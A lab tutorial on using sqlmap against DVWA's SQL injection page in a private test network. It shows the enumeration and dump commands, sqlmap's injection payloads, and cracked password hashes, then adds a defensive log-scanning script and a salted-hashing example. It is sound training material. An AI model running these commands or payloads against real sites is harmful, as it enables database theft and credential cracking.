(3) ※ Hands-on: probing DVWA's SQL injection vulnerability with SQLmap

DVWA Cookie

PHPSESSID=j4a07r1il0o7kahb07evptvft4


On CentOS 6.5 (the SQLmap host, 192.168.112.128):

Exercise 1: enumerate the user name and password for the MySQL database login

sqlmap -u "http://192.168.112.100/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie='security=low; PHPSESSID=j4a07r1il0o7kahb07evptvft4' -b --current-db --current-user


Exercise 2: this command enumerates the user names and password hashes of all MySQL login accounts; the hashes can later be cracked to recover the plaintext passwords

sqlmap -u "http://192.168.112.100/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie='security=low; PHPSESSID=j4a07r1il0o7kahb07evptvft4' --string="Surname" --users --password


Exercise 3: enumerate the names of all databases on the system

sqlmap -u "http://192.168.112.100/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie='security=low; PHPSESSID=j4a07r1il0o7kahb07evptvft4' --dbs


Exercise 4: enumerate the tables of the DVWA database

sqlmap -u "http://192.168.112.100/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie='security=low; PHPSESSID=j4a07r1il0o7kahb07evptvft4' -D dvwa --tables


Exercise 5: retrieve all column names of the users table in the DVWA database

sqlmap -u "http://192.168.112.100/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie='security=low; PHPSESSID=j4a07r1il0o7kahb07evptvft4' -D dvwa -T users --columns


Exercise 6: database dump (拖库)

sqlmap -u "http://192.168.112.100/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie='security=low; PHPSESSID=j4a07r1il0o7kahb07evptvft4' -D dvwa -T users -C user,password --dump


Exercise 6: the database dump as executed:

[root@501lilaoshi65 ~]# sqlmap -u "http://192.168.112.100/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie='security=low; PHPSESSID=j4a07r1il0o7kahb07evptvft4' -D dvwa -T users -C user,password --dump

        ___

       __H__

 ___ ___[']_____ ___ ___  {1.0.10.24#dev}

|_ -| . [,]     | .'| . |

|___|_  [,]_|_|_|__,|  _|

      |_|V          |_|   http://sqlmap.org


[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] starting at 12:10:28


[12:10:29] [INFO] resuming back-end DBMS 'mysql' 

[12:10:29] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (GET)

    Type: boolean-based blind

    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)

    Payload: id=2' OR NOT 2561=2561#&Submit=Submit


    Type: error-based

    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

    Payload: id=2' AND (SELECT 3481 FROM(SELECT COUNT(*),CONCAT(0x716b7a6b71,(SELECT (ELT(3481=3481,1))),0x7178787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- MLxX&Submit=Submit


    Type: AND/OR time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind

    Payload: id=2' AND SLEEP(5)-- Rwnu&Submit=Submit


    Type: UNION query

    Title: MySQL UNION query (NULL) - 2 columns

    Payload: id=2' UNION ALL SELECT CONCAT(0x716b7a6b71,0x6f52674a596762686d6f6343704464616d554f626d424c4e4f72674d5742634f4468685073565361,0x7178787671),NULL#&Submit=Submit

---

[12:10:29] [INFO] the back-end DBMS is MySQL

web server operating system: Linux CentOS 6.8

web application technology: PHP 5.3.3, Apache 2.2.15

back-end DBMS: MySQL >= 5.0

[12:10:29] [INFO] fetching entries of column(s) '`user`, password' for table 'users' in database 'dvwa'

[12:10:29] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique

[12:10:29] [INFO] the SQL query used returns 5 entries

[12:10:29] [INFO] resumed: "1337","8d3533d75ae2c3966d7e0d4fcc69216b"

[12:10:29] [INFO] resumed: "admin","5f4dcc3b5aa765d61d8327deb882cf99"

[12:10:29] [INFO] resumed: "gordonb","e99a18c428cb38d5f260853678922e03"

[12:10:29] [INFO] resumed: "pablo","0d107d09f5bbe40cade3de5c71e9e9b7"

[12:10:29] [INFO] resumed: "smithy","5f4dcc3b5aa765d61d8327deb882cf99"

[12:10:29] [INFO] analyzing table dump for possible password hashes                                    

[12:10:29] [INFO] recognized possible password hashes in column 'password'

do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y

[12:10:32] [INFO] writing hashes to a temporary file '/tmp/sqlmapVDAf111901/sqlmaphashes-BmDqSj.txt' 

do you want to crack them via a dictionary-based attack? [Y/n/q] y

[12:10:34] [INFO] using hash method 'md5_generic_passwd'

[12:10:34] [INFO] resuming password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'

[12:10:34] [INFO] resuming password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'

[12:10:34] [INFO] resuming password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'

[12:10:34] [INFO] resuming password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'

[12:10:34] [INFO] postprocessing table dump

Database: dvwa

Table: users

[5 entries]

+---------+---------------------------------------------+

| user    | password                                    |

+---------+---------------------------------------------+

| 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |

| admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |

| gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   |

| pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |

| smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |

+---------+---------------------------------------------+


[12:10:34] [INFO] table 'dvwa.users' dumped to CSV file '/root/.sqlmap/output/192.168.112.100/dump/dvwa/users.csv'

[12:10:34] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.112.100'


[*] shutting down at 12:10:34


[root@501lilaoshi65 ~]# 
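The four injection payloads sqlmap resumed above (boolean-based blind, error-based, time-based blind and UNION query) are the same strings that end up in the web server's access log, which is where a defender looks for them. The Python script below is an added example, not part of the original lab and not code from sqlmap or DVWA: it parses Apache combined-format log lines, URL-decodes every query parameter and classifies each request by the technique its payload matches. The log lines are constructed for this example and modelled on the session above (request paths and the sqlmap User-Agent string are sample data, not a real log from the lab host).

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format log lines modelled on the sqlmap session above.
# Sample data for this example only, not a real log from the lab host.
SAMPLE_LOG = """\
192.168.112.1 - - [07/Sep/2022:12:09:55 +0800] "GET /DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
192.168.112.128 - - [07/Sep/2022:12:10:29 +0800] "GET /DVWA-1.9/vulnerabilities/sqli/?id=2%27%20OR%20NOT%202561%3D2561%23&Submit=Submit HTTP/1.1" 200 4410 "-" "sqlmap/1.0.10.24#dev (http://sqlmap.org)"
192.168.112.128 - - [07/Sep/2022:12:10:29 +0800] "GET /DVWA-1.9/vulnerabilities/sqli/?id=2%27%20AND%20%28SELECT%20COUNT%28%2A%29%2CFLOOR%28RAND%280%29%2A2%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29--%20MLxX&Submit=Submit HTTP/1.1" 200 4410 "-" "sqlmap/1.0.10.24#dev (http://sqlmap.org)"
192.168.112.128 - - [07/Sep/2022:12:10:29 +0800] "GET /DVWA-1.9/vulnerabilities/sqli/?id=2%27%20AND%20SLEEP%285%29--%20Rwnu&Submit=Submit HTTP/1.1" 200 4410 "-" "sqlmap/1.0.10.24#dev (http://sqlmap.org)"
192.168.112.128 - - [07/Sep/2022:12:10:29 +0800] "GET /DVWA-1.9/vulnerabilities/sqli/?id=2%27%20UNION%20ALL%20SELECT%20CONCAT%280x716b7a6b71%2CNULL%29%2CNULL%23&Submit=Submit HTTP/1.1" 200 4600 "-" "sqlmap/1.0.10.24#dev (http://sqlmap.org)"
192.168.112.1 - - [07/Sep/2022:12:11:02 +0800] "GET /DVWA-1.9/vulnerabilities/sqli/?id=3&Submit=Submit HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
"""

# Apache "combined" log format: ip ident user [time] "method path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# One narrow signature per technique reported in the sqlmap session above.
# Narrow patterns keep false positives low on ordinary form input.
SIGNATURES = [
    ("boolean-based blind", re.compile(r"\b(OR|AND)\s+(NOT\s+)?\d+\s*=\s*\d+", re.I)),
    ("error-based", re.compile(r"\bFLOOR\s*\(\s*RAND\s*\(", re.I)),
    ("time-based blind", re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
]


def decode_query(path):
    """Split the request path's query string into {parameter: URL-decoded value}."""
    if "?" not in path:
        return {}
    params = {}
    for pair in path.split("?", 1)[1].split("&"):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def classify_value(value):
    """Return the names of every injection technique whose signature matches the value."""
    return [name for name, rx in SIGNATURES if rx.search(value)]


def scan_log(text):
    """Parse each log line and report every parameter carrying an injection payload."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        for param, value in decode_query(m["path"]).items():
            techniques = classify_value(value)
            if techniques:
                findings.append({
                    "ip": m["ip"],
                    "time": m["ts"],
                    "param": param,
                    "techniques": techniques,
                    # The default sqlmap User-Agent is an easy extra signal, but a
                    # scanner can change it, so the payload match is the primary evidence.
                    "scanner_ua": m["ua"].lower().startswith("sqlmap"),
                })
    return findings


def summarize_by_source(findings):
    """Aggregate findings per client IP: request count and the set of techniques seen."""
    summary = {}
    for f in findings:
        entry = summary.setdefault(f["ip"], {"requests": 0, "techniques": set()})
        entry["requests"] += 1
        entry["techniques"].update(f["techniques"])
    return summary


if __name__ == "__main__":
    for ip, info in summarize_by_source(scan_log(SAMPLE_LOG)).items():
        print(f"{ip}: {info['requests']} injection request(s), "
              f"techniques: {sorted(info['techniques'])}")
```

A single client sending several distinct techniques against one parameter within the same second, as the summary shows for 192.168.112.128, is the characteristic footprint of an automated scanner rather than a stray malformed request, and is a reasonable alerting threshold for a log-monitoring rule.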



************************************************************************

sqlmap options

sqlmap -u "url" --cookie='security=low;PHPSESSID=x' [other options]

 1. -u: specify the target URL (the SQL injection point)

 2. --cookie: set our cookie value


Other options:

 3. -b: retrieve the DBMS banner (DBMS: Database Management System)


 4. --current-db: retrieve the current database

 5. --current-user: retrieve the current user


 6. --string="Surname": the string to match in the page when the query evaluates true

 7. --users: enumerate DBMS users

 8. --password: enumerate DBMS user password hashes (the full option name is --passwords; sqlmap accepts the unambiguous prefix)


 9. --dbs: enumerate all databases in the DBMS [database]

10. --tables: enumerate all tables of a DBMS database [table]

11. --columns: enumerate all columns of a DBMS table [column]


12. -D dvwa: the DBMS database to enumerate, dvwa [database]

13. -T users: the DBMS table to enumerate, users [table]

14. -C user,password: the columns of the DBMS table to enumerate, user,password [column]


--dump: dump the DBMS table entries

************************************************************************
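The dump in Exercise 6 recovers every password because DVWA stores unsalted MD5: identical passwords (admin and smithy) produce identical hashes, and a plain dictionary lookup resolves them, which is what sqlmap's "dictionary-based attack" prompt does. The Python below is an added example, not part of the lab and not DVWA's code: it checks that property against the five rows from the dump above and shows the hardened alternative, a per-user random salt with an iterated key derivation function. The record format `pbkdf2_sha256$<iterations>$<salt_hex>$<hash_hex>` and the iteration count are assumptions of this example, not a scheme DVWA uses.

```python
import hashlib
import hmac
import os

# The user/password rows as the sqlmap dump above recovered them from dvwa.users.
# The plaintext beside each hash is what sqlmap's dictionary lookup resolved.
DUMPED_ROWS = {
    "1337":    ("8d3533d75ae2c3966d7e0d4fcc69216b", "charley"),
    "admin":   ("5f4dcc3b5aa765d61d8327deb882cf99", "password"),
    "gordonb": ("e99a18c428cb38d5f260853678922e03", "abc123"),
    "pablo":   ("0d107d09f5bbe40cade3de5c71e9e9b7", "letmein"),
    "smithy":  ("5f4dcc3b5aa765d61d8327deb882cf99", "password"),
}


def is_unsalted_md5(stored_hash, plaintext):
    """True if the stored value is plain MD5 of the password with no salt."""
    return hmac.compare_digest(hashlib.md5(plaintext.encode()).hexdigest(), stored_hash)


def users_sharing_hashes(rows):
    """Map each stored hash to the users that share it.

    With unsalted hashes an identical hash means an identical password, so one
    cracked account immediately exposes every other account with the same hash.
    """
    by_hash = {}
    for user, (stored_hash, _plain) in rows.items():
        by_hash.setdefault(stored_hash, []).append(user)
    return {h: sorted(u) for h, u in by_hash.items() if len(u) > 1}


# Hardened storage (assumed scheme for this example): a random 16-byte per-user salt
# and PBKDF2-HMAC-SHA256, serialized as "pbkdf2_sha256$<iterations>$<salt_hex>$<hash_hex>".
PBKDF2_ITERATIONS = 600_000  # assumed work factor; tune to the server's budget


def make_password_record(password, salt=None, iterations=PBKDF2_ITERATIONS):
    """Derive a salted, iterated hash; a fresh salt makes equal passwords differ."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password_record(record, password):
    """Recompute the derivation from the stored salt and compare in constant time."""
    try:
        scheme, iterations, salt_hex, digest_hex = record.split("$")
    except ValueError:
        return False  # malformed or foreign record format
    if scheme != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    for user, (stored, plain) in DUMPED_ROWS.items():
        print(f"{user}: unsalted MD5 of '{plain}'? {is_unsalted_md5(stored, plain)}")
    print("accounts sharing a hash:", users_sharing_hashes(DUMPED_ROWS))
    r1, r2 = make_password_record("password"), make_password_record("password")
    print("same password, different records:", r1 != r2)
    print("verifies:", verify_password_record(r1, "password"),
          "rejects wrong password:", not verify_password_record(r1, "Password"))
```

Two consequences follow for the defender reading the dump: the duplicate hash for admin and smithy would not exist under a salted scheme, and a dictionary attack that finishes in a second against MD5 must repeat hundreds of thousands of hash operations per guess against the iterated record, which is the point of the work factor.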